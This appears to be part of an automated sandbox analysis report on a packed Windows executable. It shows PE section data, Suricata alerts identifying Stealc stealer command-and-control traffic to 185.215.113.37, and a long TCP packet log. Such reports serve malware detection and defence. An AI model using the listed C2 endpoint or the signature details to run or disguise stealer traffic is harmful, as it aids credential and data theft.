IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	ca48361187c0e616e59d5297cc36c2d8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2a6000	0x200	e12b2d3ea18c05e295f719ca06a0ca70	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lbueklyw	0x504000	0x1a1000	0x1a0a00	8c1a7adf23b7267e2ce0daf1ff317c9b	False	0.9952053799129913	data	7.955095923620568	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
peelksdh	0x6a5000	0x1000	0x600	675e9f872177b54aaf3805dff427ae8a	False	0.5625	data	4.907526587569288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6a6000	0x3000	0x2200	e517798cc9458ca8845b82f43d8c6a69	False	0.06158088235294118	DOS executable (COM)	0.7191489669683624	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T01:28:13.594142+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:13.816453+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:13.822975+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.9	49706	TCP
2024-09-27T01:28:14.039345+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:14.086742+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.9	49706	TCP
2024-09-27T01:28:15.167028+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:15.883379+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:21.006831+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:22.106565+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:22.752690+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:23.467266+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:25.193248+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP
2024-09-27T01:28:25.696800+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49706	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 01:28:12.647800922 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:12.652590990 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:12.652662992 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:12.652839899 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:12.657645941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.356488943 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.356542110 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.360033035 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.364787102 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.594053030 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.594141960 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.595463037 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.600208044 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.816384077 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.816452980 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.816545963 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:13.816589117 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.817775965 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:13.822974920 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039243937 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039264917 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039283991 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039299965 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039311886 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039345026 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.039402962 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.039516926 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039530039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.039570093 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.039582014 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.081892014 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.086741924 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.302524090 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.302637100 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.320244074 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.320310116 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:14.325119019 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.325176954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.325186968 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.325241089 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.325381041 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:14.325391054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.166891098 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.167027950 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.440720081 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.455030918 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883271933 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883291006 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883307934 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883322954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883339882 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883378983 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.883435011 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.883567095 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883584976 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883601904 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883615017 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.883615971 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883632898 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883642912 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.883649111 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883666039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883675098 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.883680105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.883698940 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.883729935 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.885236025 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.885307074 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.887819052 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887830019 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887835026 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887846947 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887851954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887857914 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887868881 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887914896 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.887940884 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.887948990 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.887980938 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889214039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889225006 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889235973 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889247894 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889260054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889261961 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889283895 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889309883 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889519930 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889533043 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889544010 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889559031 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889566898 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889585972 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889616966 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.889843941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.889894962 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.890081882 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.890094042 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.890105009 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.890115976 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.890126944 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.890131950 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.890172005 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.891011000 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.891060114 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.915055990 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915080070 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915091991 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915203094 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915215015 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915225983 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915232897 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.915277958 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915285110 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.915323973 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.915508032 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915519953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915565968 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.915590048 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915601969 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915612936 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.915649891 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.915678978 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.916143894 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916157007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916219950 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.916229963 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916240931 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916253090 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916264057 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916275978 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.916282892 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.916300058 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.916332006 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.917078972 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917118073 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917128086 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917134047 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.917160034 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.917177916 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.917243958 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917257071 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917268038 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917279005 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.917299032 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.917325020 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.918065071 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918082952 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918095112 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918116093 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.918147087 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.918210030 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918220997 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918232918 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918257952 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.918288946 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.918294907 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.918345928 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.919075966 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919087887 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919097900 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919110060 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919130087 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.919172049 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.919197083 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919207096 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919224024 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.919240952 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.919253111 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.919996023 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.920025110 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.920037031 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.920059919 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.920082092 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.920114040 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.920125961 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:15.920157909 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:15.920182943 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.039622068 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.039726019 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.039769888 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.039779902 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.039818048 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.039834976 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.040036917 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040046930 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040085077 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.040414095 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040426970 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040476084 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.040571928 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040584087 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040592909 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.040617943 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.040643930 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.041157007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.041169882 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.041181087 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.041218996 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.041235924 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.041974068 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.041987896 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042001963 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042013884 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042023897 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042032003 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.042072058 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.042088985 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.042828083 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042840958 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042851925 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.042880058 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.042895079 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.043679953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.043729067 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.044353962 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.044367075 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.044378042 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.044388056 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.044406891 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.044435024 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.045056105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.045068026 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.045079947 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.045109034 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.045124054 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.045644999 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.045656919 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.045694113 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.045710087 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.046293974 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.046314001 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.046341896 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.046358109 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.046895981 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.046907902 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.046919107 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.046976089 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.046991110 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.047558069 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.047570944 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.047580004 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.047612906 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.047636986 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.048460007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.048472881 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.048479080 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.048490047 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.048517942 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.048546076 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.049236059 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.049254894 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.049267054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.049287081 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.049319029 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.050014973 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.050029039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.050040007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.050071955 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.050096035 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.050792933 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.050813913 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.050825119 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.050852060 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.050875902 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.051597118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.051609039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.051620960 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.051630974 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.051645041 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.051661015 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.051683903 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.052377939 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.052428961 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.053136110 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.053148985 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.053160906 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.053193092 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.053210020 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:16.053920984 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.053934097 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:16.053944111 CEST	80	49706	185.215.113.37	192.168.2.9
